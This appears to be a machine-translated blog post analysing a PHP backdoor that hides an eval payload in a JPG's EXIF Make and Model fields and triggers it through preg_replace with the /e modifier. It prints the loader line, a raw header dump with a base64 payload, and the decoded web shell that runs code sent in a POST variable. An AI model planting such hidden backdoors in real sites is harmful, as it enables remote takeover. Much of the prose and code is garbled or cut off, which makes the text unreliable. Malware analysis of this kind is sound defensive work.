Malicious Software hidden in jpg exif header information

Malicious Software hidden in jpg exif header information

The backdoor program is divided into two parts. The first part is the combination of the exif_read_data function of the image header to be read and some preg_replaCe functions to execute the content.

$exif = exif_read_data(‘/homepages/Clientsitepath/images/stories/food/bun.jpg’);preg_replace($exif[‘Make’],$exif[‘Model’],”);

These two functions are harmless. Exif_read_data is usually used to read images and replace string content. However, there is even a hidden and tricky option location. If you pass the "/e" modifier, it will execute (eval) instead of simply searching for the replaced content.

When we look at the bun.jpg file, we find the second part of the backdoor program:

Ø Oracle ^ @ ^ PJFIF ^ @ ^ A ^ B ^ @ d ^ @ ÿ á^ @ ¡Exif ^ @ II * ^ @ ^ H ^ @ ^ B ^ @ ^ O ^ A ^ B ^ @ ^ F ^ @ & ^ @ ^ P ^ A ^ B ^ @ m ^ @, ^ @/. */e ^ @ eval (base64_decode ("aWYgKGl zc2V0KCRfUE9TVFsie encode = ')); @ ÿ ì ^ @ ^ QDucky ^ @ ^ A ^ @ ^ D ^ @ <^ @ ÿ î ^ @ ^ NAdobe ^ this is even used for execution (eval) no matter the exact modifier passed to it.

If we keep looking at the EXIF data, we can see that the title of "model" in "eval (base64_decode" is hidden. When you put them together, we can see what happened. Attackers are reading the manufacturers and models from EXIF and filling even with their heads. Once the $ exif ['make'] and $ exif ['model'] modified are in the file, we get the final backdoor program:

preg_replace (“/.*/e”, ,”@ eval ( base64_decode(“aWYgKGl …”);

Once decoded, we can see that it is only executed regardless of the content by the POST variable.

if (isset( $_POST[“zz1″])) { eval (stripslashes( $_POST[“zz1″]..